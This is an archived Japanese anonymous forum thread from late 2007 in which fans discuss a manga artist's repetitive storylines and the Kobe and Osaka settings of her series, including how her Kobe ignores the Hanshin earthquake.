151 :花と名無しさん:2007/11/28(水) 22:08:01 ID:???O
毎回似たような設定やキャラかもだが、スタイリッシュなのにほんわかしていて幸せな気分になるんだ。
主人公と自分がと同じ名前の作品は実はちょっと嬉しい。



152 :花と名無しさん:2007/11/28(水) 22:35:16 ID:???0
KYだなw

153 :花と名無しさん:2007/11/28(水) 23:19:38 ID:???0
>>151
ケンソウ乙

154 :花と名無しさん:2007/11/30(金) 18:25:03 ID:???O
1作品読むだけなら、ゆったりまろやかな作風にほろ酔うかもしれんが…
数作品読んでいくうちにどれもワンパタでそのうち飽きてしまうガハ漫画…

155 :花と名無しさん:2007/11/30(金) 18:29:20 ID:???0
すごく狭い世界でいくつもの作品が展開されてるもんね。


156 :花と名無しさん:2007/11/30(金) 21:05:00 ID:???0
今まで出てきてる主人公ら、
みんな同じ町内なんじゃね?w

157 :花と名無しさん:2007/11/30(金) 21:33:27 ID:???0
みんな三宮起点にして半径1キロ圏内で生きていそうw

158 :花と名無しさん:2007/11/30(金) 23:10:04 ID:???O
たしかに神戸は狭い街だ。ごちゃごちゃしている。
でもガハの漫画の中の神戸は、その10倍の広さがありそうな気がしてならない…w

159 :花と名無しさん:2007/12/01(土) 04:33:19 ID:???0
>>156
それどころか同じマンションに住んでいるw

160 :花と名無しさん:2007/12/01(土) 09:04:04 ID:???0
リツコとまりをちゃんは同業者

「LINE」って神戸が舞台?

161 :花と名無しさん:2007/12/01(土) 11:11:35 ID:???O
>>160

いつかラインにまりをちゃん出てきそうだ。
画伯の作品確かにワンパターンだが、たまに読み返すと癒される。
お決まりの定番があってもよいかと。

162 :花と名無しさん:2007/12/01(土) 16:37:29 ID:???0
Voiceぐらいの短編集がちょうどいいなあ
短編ではスルーできてた矛盾が
長編になるとすんげー気になってくるw

163 :花と名無しさん:2007/12/02(日) 01:49:57 ID:???0
LUNEは神戸が舞台っぽいけど
実際はクリスタ長堀(大阪ミナミ)。

短編ばかりでも昔とは違ってまた同じような話になりそうな予感。


164 :花と名無しさん:2007/12/02(日) 15:39:13 ID:???0
ガハの「昔の漫画の」小粋な
小物遣いや台詞回しが懐かしい。
今のガハ、嫌いじゃないんだよ・・・。

嫌いじゃないだけになんとかなって欲しいw

165 :花と名無しさん:2007/12/02(日) 17:09:51 ID:???0
ライン、外観はミナミのオーパと新神戸のところが混じってるよねw
どっちかにしたらいいのに。
リツコさんが吠えてた港は神戸だし、芦屋にショップがとか言ってたから、
神戸のお話しなんだろうけど。

166 :花と名無しさん:2007/12/02(日) 18:30:34 ID:???O
次回作の舞台は是非都内にお願いしたい。
でもガハが選びそうなのは銀座だろな。もしくはシロガネーゼが主人公とか。


167 :花と名無しさん:2007/12/02(日) 21:05:57 ID:TCsN8jKG0
3年ぐらい東京に住んで遊ばないと描けないと思うが…。
そういえば「一緒に遭難したいひと」で東京に遊びに行
く話ならあった。

168 :花と名無しさん:2007/12/02(日) 22:24:19 ID:???0
?地元(渋谷)が出てきてなぜかはわからんが軽くムカついたので
東京進出はやめていただきたい。


169 :花と名無しさん:2007/12/02(日) 22:55:58 ID:???O
流れ切りますが、エイコが骨抜きにしようとしてる
リーマンの客は既婚者だったよねぇ、
ユキがヨリ戻した?リーマンは独身だったっけ…?
今までガハ好みのヤンエグ(pgr)って大概既婚者だから、
またソレ系?と急に気になった。でも読み返すのはめんどくさいwww

170 :花と名無しさん:2007/12/02(日) 23:51:34 ID:???0
ユキの彼氏は27歳独身じゃなかったっけ

171 :花と名無しさん:2007/12/02(日) 23:55:32 ID:???0
嫁がいそう、というプロファイリングだけじゃなかったっけ

172 :花と名無しさん:2007/12/03(月) 00:10:27 ID:???0
エイコの狙ってる青谷さんの友達が「嫁さん大事にしろよ」とか言ってたから
妻帯者だと思う。

173 :花と名無しさん:2007/12/03(月) 01:32:14 ID:???0
ガハに東京は無理でしょ
付いてこれないよもう

174 :花と名無しさん:2007/12/03(月) 01:34:36 ID:???0
>>168
そんな調子で、大阪をネタにされると軽くむかつきます。
はよ神戸に帰れガハ

175 :花と名無しさん:2007/12/03(月) 03:11:49 ID:???0
大阪で稼いで神戸に帰る
とか言ってたのはどうなったんだ?

176 :花と名無しさん:2007/12/03(月) 06:53:32 ID:???O
ガハのマンガの中の神戸は阪神大震災が起こらなかった神戸だからなぁ…
阪神大震災以前のバブルの空気を残したまま、いまの神戸を描いているから、登場人物の感覚がなんかちぐはぐなんだよな…
特に建築関係の話なら、阪神大震災は避けては通れないのに…
そこまでリアルを求める必要もないとはいえ、いまのガハのなんちゃってファンタジーはどうにかならんもんかと思う。


177 :花と名無しさん:2007/12/03(月) 12:14:33 ID:???0
今の神戸も震災前と見た目はあんまり変わらないよ。
綺麗になった所もあるし、がんばって復興したし、
その辺書けばいいのにと思う。そんなにトラウマになっちゃったのか?
あれだけブランド物買ってるんだから帰るお金は普通にあるだろに

178 :花と名無しさん:2007/12/03(月) 21:11:12 ID:???O
ダンナの事情ってこともあるんじゃない。


36 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)